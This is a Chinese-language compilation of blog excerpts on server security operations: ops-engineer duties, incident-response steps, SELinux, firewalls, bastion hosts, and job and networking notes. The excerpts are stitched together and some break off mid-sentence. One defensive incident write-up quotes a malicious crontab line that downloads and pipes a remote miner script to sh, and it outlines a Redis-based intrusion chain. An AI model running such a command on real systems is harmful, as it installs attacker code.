安全运维

安全 运维人员的权限很大，一定要保证账号/私钥的安全 使用加密工具存储，给ssh私钥加密码，基于本地存储；稳定安全是运维的最高责任。 责任心 遇到报警要第一时间进行处理，不用等着别人去处理；如无法处理，应该第一时间让同事协助帮忙， 细心 自己的任何一个操作都要谨慎，都有可能造成系统的损害、业务出问题等。敲命令一定细心、再三确认，再快的手速也就省下几秒钟，但是出了问题就是大事 推进及改善 如果代码有问题，造成系统的开销很大，比如负载、io等，应该第一时间和开发联系，优化代码。 进取心 运维知识广泛、要不断的学习。遇到问题，做好分析及记录，事后可以在部门内部进行分享和交流。 懂网络、懂系统、懂数据库、还要懂业务逻辑。 抗压能力 拥有良好的心态。 永远不要只有一个方案 解决问题不要只想一个方案，多想几个方案，多几手准备反正不会有坏处~ 沟通能力 描述问题： 你需要描述清楚在工作中遇到的问题，及时寻求帮助。 解释不能实现的功能： 当你向客户解释某个产品的功能时，哪些是可以展现出来，哪些是不能实现，那不能实现的功能有没有替代方案，都需要描述清楚。 来源： 51CTO 作者： 沈夣未央 链接： https://blog.51cto.com/13870640/2448453

下面我们看一个标准的服务器安全应急影响应该怎么做，也算是笔者从事安全事件应急近 6 年以来的一些经验之谈，借此抛砖引玉，希望大神们不吝赐教。 图 1：处理思路 如上图，将服务器安全应急响应流程分为如下 8 个环节： 发现安全事件（核实） 现场保护 服务器保护 影响范围评估 在线分析 数据备份 深入分析 事件报告整理 接下来我们将每个环节分解，看看需要如何断开异常连接、排查入侵源头、避免二次入侵等。 核实信息（运维/安全人员） 根据安全事件通知源的不同，分为两种： 外界通知： 和报告人核实信息，确认服务器/系统是否被入侵。现在很多企业有自己的 SRC（安全响应中心），在此之前更多的是依赖某云。这种情况入侵的核实一般是安全工程师完成。 自行发现： 根据服务器的异常或故障判断，比如对外发送大规模流量或者系统负载异常高等，这种情况一般是运维工程师发现并核实的。 现场保护（运维） 我们很多人看过大陆的电视剧《重案六组》，每次接到刑事案件，刑警们第一时间就是封锁现场、保存现场原状。 同样道理，安全事件发生现场，跟刑事案件发生现场一样，需要保存第一现场重要信息，方便后面入侵检测和取证。 保存现场环境（截图） 相关信息采集命令如下： 进程信息： ps axu 网络信息： netstat –a 网络+进程： lsof / netstat -p 攻击者登陆情况（截图） 相关信息采集命令如下：

第四期 目标 熟悉seLinux，了解seLinux的用途，关闭seLinux 熟悉iptables防火墙，掌握打开关闭，配置等基本选项 熟悉firewalled防火墙，掌握打开关闭，配置等基本选项 配合使用scanport进行 1.seLiunx 安全增强型 Linux（Security-Enhanced Linux）简称 SELinux，它是一个 Linux 内核模块，也是 Linux 的一个安全子系统。 SELinux 主要由美国国家安全局开发。2.6 及以上版本的 Linux 内核都已经集成了 SELinux 模块。 由于linux的权限采用的是文件-用户-用户组的模式，创建文件的用户具有文件的所有权限，一旦某个用户被突破，系统的风险的无限加大。而selinux不太一样，由管理员来创建安全规则，控制资源访问，比如定义了http进程可以访问哪些文件、哪些目录，即便root有所有文件的修改和访问权限，违反了管理员应用规则，一样无法访问，当然配置会比较复杂。 进入/etc/selinux目录中，查看config文件 selinux配置有三项：缺省是强制策略。 enforcing - 强制打开,拒绝违反安全策略 permissive - 遇到违反安全策略仍正常执行，但输出警告 disabled - 关闭安全策略 输入getenforce查看当前的状态为enforcing

这几年对运维人员来说最大的变化可能就是公有云的出现了，我相信可能很多小伙伴公司业务就跑在公有云上， 因为公司业务关系，我个人接触公有云非常的早，大概在12年左右就是开始使用亚马逊云，后来逐渐接触到国内的阿里，腾讯云等，随着公司业务往国内发展，这几年我们也使用了很多国内的公有云厂商，所以在云运维方面也积累了一些经验，从传统的物理机到公有云运维，我个人认为最大的问题就是你能不能用公有云的思路去思考去实现一个安全稳定、可伸缩和经济的业务构架，云运维是有别与传统运维的，比如说了解公有云的都知道安全组的概念，安全组跟防火墙功能很相似，那我的机器是要设置iptables还是要设置安全组呢？设置了安全组还要设置iptables吗？他们有什么区别？我相信很多人对这些有些困惑，以我个人经验（因为我接触亚马逊后就再也没有给云主机配置过iptables了），我给的建议是如果可以用安全组就不用iptables来管理机器，因为它们有本质的区别： 第一，安全组是在宿主上面的拦截，iptables是在系统层面的拦截，也就是说如果有人想***你，你采用的是安全组方式，这个***包根本就到不了你机器上。 第二，配置iptables是项复杂的工程，如果稍有不慎，后果是毁灭性的，我猜测有过2年运维经验小伙伴应该有把自己关在主机外面的经历，如果采用安全组这方面是可控的，即使有问题，你基本上也可以快速恢复。 第三

摘要：信息化高度发展的今天，企业（组织）的信息化程度已是今非昔比，IT基础设施规模空前庞大，IT资产安全已不容忽视，认识并选择合适的堡垒机，对企业（组织）的IT资产和数据安全至关重要。 前言 随着互联网和云计算技术的发展，很多企业（组织）特别是中大型企业和互联网企业，保有了规模较大的IT基础设施，拥有并维护着数量较多的服务器。企业的业务运作在很大程度上依赖于IT基础设施的正常和稳定运行，为了确保IT基础设施的稳定运行，堡垒机成为了不可或缺的运维保障设施。那么，什么是堡垒机呢？ 什么是堡垒机 通常，根据内部计算机系统或网络的大小和安全等级要求的不同，会设置一台或多台计算机系统作为从外部网络访问内部系统和网络的入口，从而屏蔽内部计算机系统或网络，使其免受来自外部网络的 或其它安全漏洞的影响，进而保护敏感或私有的数据和网络的安全。这样的一台或多台计算机系统即被称为堡垒机。堡垒机是内部计算机系统或网络面向外部的唯一入口，亦即是说外部只有通过堡垒机才可以访问到内部计算机系统或网络，作为这样一种特殊用途的计算机系统，其必须通过专门的配置来抵御外部 ，满足一定的功能要求，从而发挥安全堡垒的作用。 作为内部计算机系统或网络的唯一入口，堡垒机的重要性是显而易见的，对内部系统或网络的访问和运维将依赖于堡垒机，此种依赖对堡垒机的要求颇高----不仅仅是简单的跳板机，而是企业（组织）IT运维的中枢

近日公司多个线上服务器发生CPU使用率过高、及crontab改动触发的报警，登录后检查发现被植入挖矿木马。经分析，这些被植入恶意木马的主机均存在redis服务。推测中招的可能为服务器因需暂时关闭火墙，导致“redis未授权访问”引发而产生安全问题。 对其进行分析，crontab植入计划任务： */10 * * * * curl -fsSL http://r.chanstring.com/pm.sh?106 | sh 下载pm.sh脚本，分析知，通过redis未授权访问的漏洞，通过authorized_keys免密码登录后，修改计划任务下载恶意脚本并执行，同时在/root/.ssh/目录下创建KHK75NEOiq文件，修改AuthorizedKeysFile的指向，删除authorized_keys文件，并修改sshd_config配置文件，同时让恶意文件依附于ntp进程，在/opt目录下生成恶意文件，如下所示： 在之前的安全检测中，发现多个挖矿木马进程，或者说起了不同的名字：minerd、yam……。如下所示： 当存在以上进程时，可能会同时存在一个被恶意植入进程lady，如果存在，需立即service lady stop。 针对以上问题的处理也比较容易，根据恶意脚本反推即可。同时要注意redis服务的安全配置。我们之前已对redis服务及防火墙策略做了安全加固

一场突如其来的疫情让我的生活节奏慢了下来，有更多时间学习和思考，这两天有些想法一直在我的脑海中萦绕，现在整理成文字与大家分享。 纳西姆·塔勒布写过一本《反脆弱》，说的是如何应对不确定性，从不确定性中获利。IT是企业业务的核心支柱与保障，但IT服务的连续性如何保障呢？企业IT是否具有脆弱性？如何提升企业IT应对突发事件的能力？ 总体而言，反脆弱能力建设的目标有以下几点：第一是系统健壮性建设，尽力降低内部和外部事件对系统的影响，确保系统的完整性不被破坏，企业的数字资产得到保护；第二是IT服务可用性建设，为服务对象提供不间断服务，以保障企业业务连续性；第三是系统可管理性建设，确保管理人员可随时执行系统管理任务，如策略管理、配置变更、故障响应和性能优化等。第四是系统持久性建设，即系统的技术升级和改造，基于即发事件的经验总结和潜在风险预测来改进系统。 鉴于企业IT的复杂性及个人能力所限，下面我将围绕四个关键组件来展开话题，他们分别是：应用的开发与运维，企业级网络与安全，云服务与平台建设，以及最终用户的服务体验。 第一节 应用的开发与运维 在与脆弱性的斗争中，应用的转型是非常积极且富有成效的。大家经常用“宠物”和“牲畜”来比喻传统企业应用和新型的云原生应用。“宠物”型应用无疑是脆弱的，非常依赖底层平台的呵护。转型为“牲畜”型应用就是为了反脆弱。云原生应用的设计原则中有几条与反脆弱有关

安全产品顾问 北京 Job Description 1. 负责安全运维服务产品的定义与开发 2.负责进行安全运维服务实施流程的制订、及相应售前资料的制订 3.负责安全运维服务解决方案的成本模型的开发与维护 4. 负责安全运维服务工作的售前与实施管理工作 5. 直接与客户进行安全服务工作的沟通和交流 6. 为客户提供安全响应服务 7. 针对客户的系统架构，提出合理的安全解决方案 8. 安全服务项目与管理文档整理和关键报告撰写 Requirements 1. 熟悉安全服务管理的整体框架与流程； 2. 熟悉ITIL及信息安全管理体系并有相应安全管理经验； 3. 参与与管理过安全运维服务项目的实施或较大规模的系统集成项目； 4. 能独立实施过风险评估、安全管理咨询或安全加固等安全服务工作； 5. 具有相对较强的组织和协调能力； 6. 具有较好的书面表达能力； 7. 至少3年以上的信息安全工作经验； 8. 具有良好的团队融入能力，较好的主动学习能力。 9. 具有CISSP/CISP等认证优先考虑； jinchan0123@gmail.com 来源： https://www.cnblogs.com/daisy0123/archive/2010/09/10/1823211.html

目录 背景 堡垒机分类 堡垒机的原理 为什么要使用堡垒机 堡垒机可以解决等保2.0中的哪些要求 背景 当今社会，信息系统已成为各企事业单位业务运营的基础,由于信息系统运维人员掌握着信息系统的最高权限，一旦运维操作出现安全问题将会给企业或单位带来巨大的损失。因此,加强 对运维人员操作行为的监管与审计 是信息安全发展的必然趋势。在此背景之下,针对运维操作管理与审计的堡垒机应运而生。使得在出现重大服务器操作事故时，能够快速有效的定位原因和责任人。堡垒机提供了一套多维度的运维操作控管控与审计解决方案，使得管理人员可以全面对各种资源(如网络设备、服务器、安全设备和数据库等)进行集中账号管理、细粒度的权限管理和访问审计，帮助企业提升内部风险控制水平。 堡垒机分类 网关型堡垒机 作为进入内网的一个检查点，部署在内外网间。性能消耗大成为瓶颈，逐渐淘汰 网关型的堡垒机被部署在外部网络和内部网络之间，其本身不直接向外部提供服务而是作为进入内部网络的一个检查点，用于提供对内部网络特定资源的安全访问控制。这类堡垒机不提供路由功能，将内外网从网络层隔离开来，因此除非授权访问外还可以过滤掉一些针对内网的来自应用层以下的攻击，为内部网络资源提供了一道安全屏障。但由于此类堡垒机需要处理应用层的数据内容，性能消耗很大，所以随着网络进出口处流量越来越大，部署在网关位置的堡垒机逐渐成为了性能瓶颈

《Windows系统管理》 什么是 BIOS？如何进入BIOS？ BIOS基本输入输出系统，一般按DEL或F2进BIOS设置程序。 什么是虚拟机？ 虚拟机运行在计算机上的一款软件程序，模拟计算机硬件功能为其他软件程序提供一个独立的计算机环境。 虚拟机运行模式？ 1）寄居架构 作为应用软件安装在操作系统上 ，可以在此应用软件上安装多个操作系统 2）原生架构 虚拟机软件直接安装在计算机硬件上，虚拟机本身就是一个操作系统 IP地址作用、组成、分类？ 1) 作用：用来标识一个节点的网络地址 2) 组成：网络位+主机位，32位，以4个十进制数来表示，之间用 . 隔开 3) 分类： A 1 - 127 网+主+主+主 B 128 -191 网+网+主+主 C 192 -223 网+网+网+主 D 224 - 239 组播(多播) E 240 - 254 科研 4) 默认子网掩码 A 类 255.0.0.0 B 类 255.255.0.0 C 类 255.255.255.0 备用配置专用IP地址？ 169.254.0.1-169.254.255.254、子网掩码为255.255.0.0 私有地址范围： A类 10.0.0.1 ~ 10.255.255.254 B类 172.16.0.1 ~ 172.31.255.254 C类 192.168.0.1 ~ 192.168.255.254